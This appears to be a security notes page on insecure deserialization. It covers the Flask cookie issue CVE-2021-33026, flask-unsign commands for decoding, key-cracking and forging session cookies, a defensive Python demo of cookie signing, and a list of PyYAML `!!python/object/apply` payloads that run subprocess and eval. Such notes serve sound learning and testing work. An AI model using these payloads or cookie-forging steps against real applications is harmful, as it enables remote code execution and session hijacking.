Insecure Deserialization
Insecure Deserialization is a vulnerability that occurs when the deserialization process can be exploited to run malicious code.
Example CVEs
CVE-2021-33026 (Flask/Python)
An insecure deserialization in Flask (Python) allowed an attacker to craft a malicious cookie with a command inside. When the cookie was deserialized, the command was executed by the server.
- Cookies can be read without the secret key
- Cookies can be forged with the secret key
- kirsle flask cookie reader (Website)
- See also: flask-session-manager (0.5k ⭐) or Flask Unsign (0.3k ⭐)
$ pip3 install flask-unsign[wordlist]
$ sudo ln -s /home/<xxx>/.local/bin/flask-unsign /usr/bin/flask-unsign
$ flask-unsign --decode --cookie 'cookie' # decode
$ flask-unsign --unsign --cookie 'cookie' # find key
$ flask-unsign --sign --cookie '' --secret 'dev' # encode
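As an added example (not code from the original page or from the flask-unsign project), here are the two bullets above in plain Python: the session payload is readable with no key at all, and only the signature (HMAC-SHA1 keyed through Flask's fixed "cookie-session" salt, the way itsdangerous derives it) lets the server tell a genuine cookie from a tampered or wrongly keyed one. The session values and the key b"dev" are constructed for the demo.

```python
import base64, hashlib, hmac, json, time, zlib

SALT = b"cookie-session"  # fixed salt Flask hands to itsdangerous for session cookies

def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def decode_session(cookie: str) -> dict:
    """Read the payload WITHOUT the secret key: it is only base64url (zlib if it starts with '.')."""
    compressed = cookie.startswith(".")
    raw = _b64d((cookie[1:] if compressed else cookie).split(".")[0])
    return json.loads(zlib.decompress(raw) if compressed else raw)

def _signature(secret_key: bytes, signed_value: bytes) -> str:
    # key_derivation="hmac": derive a per-salt key, then HMAC-SHA1 over "payload.timestamp"
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(derived, signed_value, hashlib.sha1).digest())

def sign_session(data: dict, secret_key: bytes, now=None) -> str:
    """How the server mints a cookie: base64url(json).base64url(timestamp).signature"""
    payload = _b64e(json.dumps(data, separators=(",", ":")).encode())
    ts = int(time.time()) if now is None else now
    stamp = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{payload}.{stamp}"
    return f"{value}.{_signature(secret_key, value.encode())}"

def verify_session(cookie: str, secret_key: bytes, max_age: int = 31 * 86400, now=None):
    """Server-side check: the session is trusted only if the HMAC matches and it is fresh.
    Any change to payload or timestamp, or a cookie signed with another key, returns None."""
    try:
        value, sig = cookie.rsplit(".", 1)
        _, stamp = value.rsplit(".", 1)
    except ValueError:
        return None
    if not hmac.compare_digest(sig, _signature(secret_key, value.encode())):
        return None
    age = (int(time.time()) if now is None else now) - int.from_bytes(_b64d(stamp), "big")
    if age < 0 or age > max_age:
        return None
    return decode_session(cookie)

if __name__ == "__main__":
    cookie = sign_session({"user": "alice", "admin": False}, b"dev")  # constructed sample
    print(decode_session(cookie))            # readable with no key at all
    print(verify_session(cookie, b"dev"))    # accepted: right key, fresh
    print(verify_session(cookie, b"other"))  # None: signature does not match
```

The takeaway for a defender is the first print: anything placed in a Flask session is visible to the client, so secrets never belong there, and the secret key is the only thing standing between a user and an accepted forged session.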
Yaml - Deserialization
PyYAML version 6 and below instantiated an insecure parser by default, which could be exploited to run Python code.
xxx: !!python/object/apply:time.sleep [2]
The xxx: key is only necessary if a specific element (e.g., xxx) is rendered.
!!python/object/apply:builtins.range [1,10,1]
!!python/object/apply:subprocess.Popen ["ls"]
!!python/object/apply:subprocess.check_output [['ls', '-la']]
!!python/object/apply:builtins.eval [ "5" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess') or 'error'" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess').check_output(['ls', '-l']).decode('utf-8') or 'error'" ]
➡️ See also: python-deserialization-payload-generator (0.08k ⭐).